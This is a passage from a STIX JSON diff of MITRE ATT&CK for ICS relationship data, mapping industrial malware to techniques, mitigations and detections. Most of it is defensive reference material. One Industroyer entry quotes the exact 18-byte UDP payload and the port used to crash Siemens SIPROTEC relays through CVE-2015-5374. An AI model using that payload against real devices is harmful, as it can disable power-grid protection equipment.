"relationship--1f785984-791e-4612-be32-9ee6903a9c0b", + "created": "2022-09-28T20:26:09.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.433Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can login to Omron PLCs using hardcoded credentials, which is documented in CVE-2022-34151.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3da977ab-c863-4e6f-a5b7-68173160da00", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3be8045a-1f0d-4460-a76b-ae830e74c1e0", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:52:05.598Z", + "description": "The name of the [Industroyer](https://attack.mitre.org/software/S0604) payload DLL is supplied by the attackers via a command line parameter supplied in one of the main backdoors execute a shell command commands. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d854cc38-adf7-485d-96b5-70606f6cb87e", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:24:28.935Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--64db6a39-64d2-4999-97d7-91c28c32f42e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--edf73653-b2d7-422f-b433-b6a428ff12d4", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:21.210Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is disguised as an Adobe Flash installer. When the file is opened it starts locking the infected computer. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8b17ad46-b0cc-4766-9cae-eba32260d468", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.135Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6f0384e6-73c8-4fc7-bc0c-0a8c2bfa473d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.069Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--274994e7-1fe9-463a-9979-46c72107bf9b", + "created": "2023-03-30T18:56:47.685Z", + "revoked": false, + "external_references": [ + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:56:47.685Z", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) collects information related to the AutoCAD application. The worm collects AutoCAD (*.dwg) files with drawings from infected systems. (Citation: ESET)", + "relationship_type": "uses", + "source_ref": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55", + "created": "2022-09-27T18:41:43.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:41:43.617Z", + "description": "Collecting information from the I/O image requires analyzing the application program running on the PLC for specific data block reads. Detecting this requires obtaining and analyzing a PLC’s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5d0a7979-0420-4fd1-b5ad-cb5565cbdf9d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "System and process restarts should be performed when a timeout condition occurs.\n", + "source_ref": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a22fabd2-836e-4141-9219-c76cc10138ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.100Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7f3ab726-ca49-4d47-b2b5-6246c6e4fdd3", + "created": "2022-09-26T15:24:07.122Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:24:07.122Z", + "description": "Monitor asset application logs which may provide information about requests for points or tags. Look for anomalies related to reading point or tag data, such as new assets using these functions, changes in volume or timing, or unusual information being queried. Many devices provide multiple ways to achieve the same result (e.g., functions with/without an acknowledgment or functions that operate on a single point vs. multiple points). Monitor for changes in the functions used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ccae6e5d-8a9e-4bab-ae77-26a2bd722f67", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:19:13.497Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects OB1 so that its malicious code sequence is executed at the start of a cycle. It also infects OB35. OB35 acts as a watchdog, and on certain conditions, it can stop the execution of OB1. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4211c12a-57cf-4ebb-910a-6af7aa09cf34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "All communication sessions to remote services should be authenticated to prevent unauthorized access.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9ad74496-e164-4068-a0f5-379f507ba864", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:23.576Z", + "description": "Monitor for logon behavior that may abuse credentials of existing accounts as a means of gaining Lateral Movement or Persistence. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dda29418-9570-405a-b7db-97e951e5aa53", + "created": "2022-09-26T19:36:13.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:35:58.409Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols and other services commonly abused for AiTM.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--636baf5a-1a1c-476b-bc54-fb27b27b58a2", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:53:22.510Z", + "description": "Monitor for file names that are mismatched between the file name on disk and that of the binary's metadata. This is a likely indicator that a binary was renamed after it was compiled. For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50c20664-75dc-451e-b026-67b1d309e4b5", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:16:50.062Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SIPROTEC DoS module exploits the CVE-2015-5374 vulnerability in order to render a Siemens SIPROTEC device unresponsive. Once this vulnerability is successfully exploited, the target device stops responding to any commands until it is rebooted manually. (Citation: Anton Cherepanov, ESET June 2017) Once the tool is executed it sends specifically crafted packets to port 50,000 of the target IP addresses using UDP. The UDP packet contains the following 18 byte payload: 0x11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66af47d7-c430-4ac9-8020-fd79b7059037", + "created": "2022-09-28T20:28:03.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.440Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can perform a UDP multicast scan of UDP port 27127 to identify Schneider PLCs that use that port for the NetManage protocol.(Citation: Dragos-Pipedream)(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the FINS (Factory Interface Network Service) protocol to scan for and obtain MAC address associated with Omron devices.(Citation: CISA-AA22-103A)(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to perform scans for TCP port 4840 to identify devices running OPC UA servers.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f951d934-d555-45e9-a564-27b84518cae4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b13417ea-d8da-497f-818f-d2d90562039a", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:13.707Z", + "description": "Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26fdd07e-d194-4f8e-a9af-d5b2f1d0222e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.170Z", + "relationship_type": "mitigates", + "description": "Restrict root or administrator access on user accounts to limit the ability to capture promiscuous traffic on a network through common packet capture tools. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--01b4a92f-da42-4dfa-8d59-53709b65940e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only authorized administrators can change service states and configurations.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8dab113a-a713-499b-ba1e-9c2cbeffb3c8", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:52:31.059Z", + "description": "Device restarts and shutdowns may be observable in device application logs. Monitor for unexpected device restarts or shutdowns.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--461e81a2-c7ad-499e-908d-05ef2f7bd9cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.073Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6aa080d0-6e25-46e5-91d8-4af11f01ceef", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:41:05.273Z", + "description": "Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6a5922e1-e282-464d-9e71-ce2c2ed44908", + "created": "2023-03-30T19:25:53.572Z", + "created_by_ref": 